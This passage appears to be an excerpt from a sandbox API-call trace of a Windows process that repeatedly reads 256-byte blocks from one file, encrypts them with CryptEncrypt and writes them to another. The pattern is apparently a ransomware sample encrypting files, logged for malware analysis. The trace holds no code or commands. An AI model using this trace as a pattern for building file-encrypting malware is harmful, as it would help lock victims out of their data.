lpOverlapped=0x0) returned 1 [0169.981] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.981] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.981] GetLastError () returned 0x0 [0169.981] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.981] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.981] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.981] GetLastError () returned 0x0 [0169.981] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.981] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.981] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.981] GetLastError () returned 0x0 [0169.981] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.981] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.982] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.982] GetLastError () returned 0x0 [0169.982] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.982] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.982] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.982] GetLastError () returned 0x0 [0169.982] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.982] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.983] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.983] GetLastError () returned 0x0 [0169.983] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.983] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.983] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.983] GetLastError () returned 0x0 [0169.983] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.983] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.983] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.983] GetLastError () returned 0x0 [0169.983] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.983] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.983] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.983] GetLastError () returned 0x0 [0169.983] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.983] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.983] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.984] GetLastError () returned 0x0 [0169.984] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.984] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.984] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.984] GetLastError () returned 0x0 [0169.984] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.984] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.984] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.984] GetLastError () returned 0x0 [0169.984] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.984] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.985] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.985] GetLastError () returned 0x0 [0169.985] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.985] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.985] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.985] GetLastError () returned 0x0 [0169.985] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.985] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.985] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.985] GetLastError () returned 0x0 [0169.985] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.985] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.985] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.985] GetLastError () returned 0x0 [0169.985] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.986] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.986] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.986] GetLastError () returned 0x0 [0169.986] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.986] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.986] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.986] GetLastError () returned 0x0 [0169.986] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.986] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.986] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.986] GetLastError () returned 0x0 [0169.986] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.986] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.986] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.986] GetLastError () returned 0x0 [0169.986] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.987] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.987] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.987] GetLastError () returned 0x0 [0169.987] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.987] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.987] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.987] GetLastError () returned 0x0 [0169.987] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.987] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.987] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.987] GetLastError () returned 0x0 [0169.987] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.988] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.988] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.988] GetLastError () returned 0x0 [0169.988] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.988] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.988] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.988] GetLastError () returned 0x0 [0169.988] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.988] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.989] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.989] GetLastError () returned 0x0 [0169.989] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.989] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.989] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.989] GetLastError () returned 0x0 [0169.989] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.989] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.989] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.989] GetLastError () returned 0x0 [0169.989] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.989] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.989] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.989] GetLastError () returned 0x0 [0169.989] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.989] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.990] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.990] GetLastError () returned 0x0 [0169.990] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.990] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.990] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.990] GetLastError () returned 0x0 [0169.990] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.990] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.990] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.990] GetLastError () returned 0x0 [0169.990] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.990] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, 